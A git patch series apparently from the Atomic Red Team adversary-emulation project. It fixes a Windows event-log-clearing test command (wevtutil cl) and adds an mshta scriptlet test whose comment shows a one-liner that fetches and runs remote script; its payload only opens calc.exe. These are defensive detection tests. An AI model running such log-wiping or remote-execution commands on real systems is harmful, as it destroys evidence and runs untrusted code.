From a15bc81f167d3b0f8096ff92435e170a780485e8 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?J=C3=B6rgen=20Maas?= <jorgen.maas@gmail.com>
Date: Mon, 11 Jun 2018 14:36:22 +0200
Subject: [PATCH 1/7] evtutil should really be wevtutil.

---
 atomics/T1070/T1070.yaml | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/atomics/T1070/T1070.yaml b/atomics/T1070/T1070.yaml
index c93196494c..72404c8a20 100644
--- a/atomics/T1070/T1070.yaml
+++ b/atomics/T1070/T1070.yaml
@@ -3,7 +3,7 @@ attack_technique: T1070
 display_name: Indicator Removal on Host
 
 atomic_tests:
-- name: Clear  Logs
+- name: Clear Logs
   description: |
     Clear Windows Event Logs
   supported_platforms:
@@ -16,7 +16,7 @@ atomic_tests:
   executor:
     name: command_prompt
     command: |
-      evtutil cl #{log_name}
+      wevtutil cl #{log_name}
 - name: FSUtil
   description: |
     Manages the update sequence number (USN) change journal, which provides a persistent log of all changes made to files on the volume.

From ac5c0633b853caaf34d4e39c177d41366600999f Mon Sep 17 00:00:00 2001
From: CircleCI Atomic Red Team doc generator <email>
Date: Mon, 11 Jun 2018 18:30:47 +0000
Subject: [PATCH 2/7] Generate docs from job=validate_atomics_generate_docs
 branch=master

---
 atomics/T1070/T1070.md   | 6 +++---
 atomics/index.md         | 2 +-
 atomics/windows-index.md | 2 +-
 3 files changed, 5 insertions(+), 5 deletions(-)

diff --git a/atomics/T1070/T1070.md b/atomics/T1070/T1070.md
index 954d1e05ce..e9eb7cc0ee 100644
--- a/atomics/T1070/T1070.md
+++ b/atomics/T1070/T1070.md
@@ -12,7 +12,7 @@ Defense Bypassed: Anti-virus, Log analysis, Host intrusion prevention systems</b
 
 ## Atomic Tests
 
-- [Atomic Test #1 - Clear  Logs](#atomic-test-1---clear--logs)
+- [Atomic Test #1 - Clear Logs](#atomic-test-1---clear-logs)
 
 - [Atomic Test #2 - FSUtil](#atomic-test-2---fsutil)
 
@@ -21,7 +21,7 @@ Defense Bypassed: Anti-virus, Log analysis, Host intrusion prevention systems</b
 
 <br/>
 
-## Atomic Test #1 - Clear  Logs
+## Atomic Test #1 - Clear Logs
 Clear Windows Event Logs
 
 **Supported Platforms:** Windows
@@ -34,7 +34,7 @@ Clear Windows Event Logs
 
 #### Run it with `command_prompt`!
 ```
-evtutil cl #{log_name}
+wevtutil cl #{log_name}
 ```
 <br/>
 <br/>
diff --git a/atomics/index.md b/atomics/index.md
index 2461586f68..be80c1b638 100644
--- a/atomics/index.md
+++ b/atomics/index.md
@@ -187,7 +187,7 @@
 - [T1054 Indicator Blocking](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
 - [T1066 Indicator Removal from Tools](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
 - [T1070 Indicator Removal on Host](./T1070/T1070.md)
-  - Atomic Test #1: Clear  Logs [windows]
+  - Atomic Test #1: Clear Logs [windows]
   - Atomic Test #2: FSUtil [windows]
   - Atomic Test #3: rm -rf [macos, linux]
 - [T1202 Indirect Command Execution](./T1202/T1202.md)
diff --git a/atomics/windows-index.md b/atomics/windows-index.md
index 026a68f648..c4a2187c7d 100644
--- a/atomics/windows-index.md
+++ b/atomics/windows-index.md
@@ -41,7 +41,7 @@
 - [T1054 Indicator Blocking](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
 - [T1066 Indicator Removal from Tools](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
 - [T1070 Indicator Removal on Host](./T1070/T1070.md)
-  - Atomic Test #1: Clear  Logs [windows]
+  - Atomic Test #1: Clear Logs [windows]
   - Atomic Test #2: FSUtil [windows]
 - [T1202 Indirect Command Execution](./T1202/T1202.md)
   - Atomic Test #1: Indirect Command Execution - pcalua.exe [windows]

From 106bb4b08f725c72968bbe4ec90cab6114c103ea Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?J=C3=B6rgen=20Maas?= <jorgen.maas@gmail.com>
Date: Tue, 12 Jun 2018 09:17:37 +0200
Subject: [PATCH 3/7] Make T1170 self-contained; add payload and provide
 working URL's.

---
 atomics/T1170/T1170.yaml |  2 +-
 atomics/T1170/mshta.sct  | 29 +++++++++++++++++++++++++++++
 2 files changed, 30 insertions(+), 1 deletion(-)
 create mode 100644 atomics/T1170/mshta.sct

diff --git a/atomics/T1170/T1170.yaml b/atomics/T1170/T1170.yaml
index 479165408a..c2cc3b93b6 100644
--- a/atomics/T1170/T1170.yaml
+++ b/atomics/T1170/T1170.yaml
@@ -12,7 +12,7 @@ atomic_tests:
     file_url:
       description: location of the payload
       type: Url
-      default: https://www.example.com/mshta.sct
+      default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1170/mshta.sct
   executor:
     name: command_prompt
     command: |
diff --git a/atomics/T1170/mshta.sct b/atomics/T1170/mshta.sct
new file mode 100644
index 0000000000..a5bf653763
--- /dev/null
+++ b/atomics/T1170/mshta.sct
@@ -0,0 +1,29 @@
+<?XML version="1.0"?>
+<scriptlet>
+  <!-- Test -->
+  <!-- mshta.exe javascript:a=(GetObject("script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1170/mshta.sct")).Exec();close(); -->
+
+<registration
+    description="Bandit"
+    progid="Bandit"
+    version="1.00"
+    classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
+	>
+
+</registration>
+
+<public>
+    <method name="Exec"></method>
+</public>
+<script language="JScript">
+<![CDATA[
+
+	function Exec()
+	{
+		var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
+	}
+
+]]>
+</script>
+
+</scriptlet>

From d7fc965d9c83cc3bb5bc062bcb8c2c70c106d7ed Mon Sep 17 00:00:00 2001
From: Brian Beyer <brianebeyer@users.noreply.github.com>
Date: Tue, 12 Jun 2018 08:04:53 -0600
Subject: [PATCH 4/7] Create CNAME

---
 CNAME | 1 +
 1 file changed, 1 insertion(+)
 create mode 100644 CNAME

diff --git a/CNAME b/CNAME
new file mode 100644
index 0000000000..2018f50428
--- /dev/null
+++ b/CNAME
@@ -0,0 +1 @@
+atomicredteam.io
\ No newline at end of file

From dd68cc2c4780490973bcf32fa4c26f3edbd8cc8f Mon Sep 17 00:00:00 2001
From: CircleCI Atomic Red Team doc generator <email>
Date: Tue, 12 Jun 2018 14:06:35 +0000
Subject: [PATCH 5/7] Generate docs from job=validate_atomics_generate_docs
 branch=master

---
 atomics/T1170/T1170.md | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/atomics/T1170/T1170.md b/atomics/T1170/T1170.md
index dc62bbf0c6..c2fb1283b5 100644
--- a/atomics/T1170/T1170.md
+++ b/atomics/T1170/T1170.md
@@ -42,7 +42,7 @@ Test execution of a remote script using mshta.exe
 #### Inputs
 | Name | Description | Type | Default Value | 
 |------|-------------|------|---------------|
-| file_url | location of the payload | Url | https://www.example.com/mshta.sct|
+| file_url | location of the payload | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1170/mshta.sct|
 
 #### Run it with `command_prompt`!
 ```

From 589f98797263aa876d3a7e3064ba08f019dacda6 Mon Sep 17 00:00:00 2001
From: Brian Beyer <brianebeyer@users.noreply.github.com>
Date: Tue, 12 Jun 2018 08:09:26 -0600
Subject: [PATCH 6/7] Delete CNAME

---
 CNAME | 1 -
 1 file changed, 1 deletion(-)
 delete mode 100644 CNAME

diff --git a/CNAME b/CNAME
deleted file mode 100644
index 2018f50428..0000000000
--- a/CNAME
+++ /dev/null
@@ -1 +0,0 @@
-atomicredteam.io
\ No newline at end of file

From 78b3c9c28f71d2c694424b2eb01cba3794f8d40c Mon Sep 17 00:00:00 2001
From: Brian Beyer <brianebeyer@users.noreply.github.com>
Date: Tue, 12 Jun 2018 08:09:31 -0600
Subject: [PATCH 7/7] Create CNAME

---
 CNAME | 1 +
 1 file changed, 1 insertion(+)
 create mode 100644 CNAME

diff --git a/CNAME b/CNAME
new file mode 100644
index 0000000000..2018f50428
--- /dev/null
+++ b/CNAME
@@ -0,0 +1 @@
+atomicredteam.io
\ No newline at end of file